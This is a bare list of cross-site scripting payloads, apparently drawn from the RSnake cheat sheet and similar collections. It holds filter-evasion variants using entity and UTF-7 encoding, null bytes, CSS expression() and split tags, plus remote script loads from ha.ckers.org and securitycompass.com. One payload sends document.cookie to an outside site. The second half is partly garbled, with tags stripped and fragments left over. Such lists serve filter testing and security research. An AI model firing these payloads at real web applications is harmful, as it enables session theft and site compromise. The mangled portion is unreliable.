              <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
              <XSS STYLE="xss:expression(alert('XSS'))">
              <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
              <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
              <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
              <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
              <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
              <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
              <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
              <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
              <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
              <HTML xmlns:xss>
              <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
              <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
              <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
              <HTML><BODY>
              <!--[if gte IE 4]>
              <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
              <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
              <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
              <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
              <? echo('<SCR)';
              <BR SIZE="&{alert('XSS')}">
              <IMG SRC=JaVaScRiPt:alert('XSS')>
              <IMG SRC=javascript:alert(&quot;XSS&quot;)>
              <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
              <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
              <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
              <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
              <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
              <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
              <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
              \";alert('XSS');//
              </TITLE><SCRIPT>alert("XSS");</SCRIPT>
              <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
              <IMG SRC="jav ascript:alert('XSS');">
              <IMG SRC="jav&#x09;ascript:alert('XSS');">
              <IMG SRC="jav&#x0A;ascript:alert('XSS');">
              <IMG SRC="jav&#x0D;ascript:alert('XSS');">
              <IMG
              SRC
              =
              "
              j
              a
              v
              a
              s
              c
              r
              i
              p
              t
              :
              a
              l
              e
              r
              t
              (
              '
              X
              S
              S
              '
              )
              "
              >
              perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
              perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
              <IMG SRC=" &#14; javascript:alert('XSS');">
              <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
              <SCRIPT SRC=http://ha.ckers.org/xss.js
              <SCRIPT SRC=//ha.ckers.org/.j>
              <IMG SRC="javascript:alert('XSS')"
              <IFRAME SRC=http://ha.ckers.org/scriptlet.html <
              <<SCRIPT>alert("XSS");//<</SCRIPT>
              <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
              <SCRIPT>a=/XSS/
              <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <A HREF="http://66.102.7.147/">XSS</A>
              <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
              <A HREF="http://1113982867/">XSS</A>
              <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
              <A HREF="http://0102.0146.0007.00000223/">XSS</A>
              <A HREF="h
              tt p://6&#09;6.000146.0x7.147/">XSS</A>
              <A HREF="//www.google.com/">XSS</A>
              <A HREF="//google">XSS</A>
              <A HREF="http://ha.ckers.org@google">XSS</A>
              <A HREF="http://google:ha.ckers.org">XSS</A>
              <A HREF="http://google.com/">XSS</A>
              <A HREF="http://www.google.com./">XSS</A>
              <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
              <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
              document.vulnerable=true;


              <document.vulnerable=true;//<
              document.vulnerable=true;
              document.vulnerable=true;



              li {list-style-image: url("javascript:document.vulnerable=true;");

              • XSS

                1script3document.vulnerable=true;1/script3




                @im\port'\ja\vasc\ript:document.vulnerable=true';

                exp/*
                document.vulnerable=true;
                .XSS{background-image:url("javascript:document.vulnerable=true");}

                BODY{background:url("javascript:document.vulnerable=true")}

                ]]

                echo('document.vulnerable=true'); ?>

                +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-



                &document.vulnerable=true;
                &{document.vulnerable=true;};







                document.vulnerable=true;

                <!--document.vulnerable=true;//-->
                <document.vulnerable=true;
                document.vulnerable=true;//-->
                document.vulnerable=true;

                document.vulnerable=true;;


                [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
                @import'http://www.securitycompass.com/xss.css';

                BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}

                XSS

                " SRC="http://www.securitycompass.com/xss.js">

                '" SRC="http://www.securitycompass.com/xss.js">
                ` SRC="http://www.securitycompass.com/xss.js">

                document.write("<SCRI");PT SRC="http://www.securitycompass.com/xss.js">

                [Mozilla]
                "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
                </script><script>alert(1)</script>
                </br style=a:expression(alert())>
                <scrscriptipt>alert(1)</scrscriptipt>
                <br size=\"&{alert('XSS')}\">
                perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
                perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
                <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
                <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
                <~/XSS STYLE=xss:expression(alert('XSS'))>
                ">alert('XSS')

                XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
                XSS STYLE=xss:e/**/xpression(alert('XSS'))>
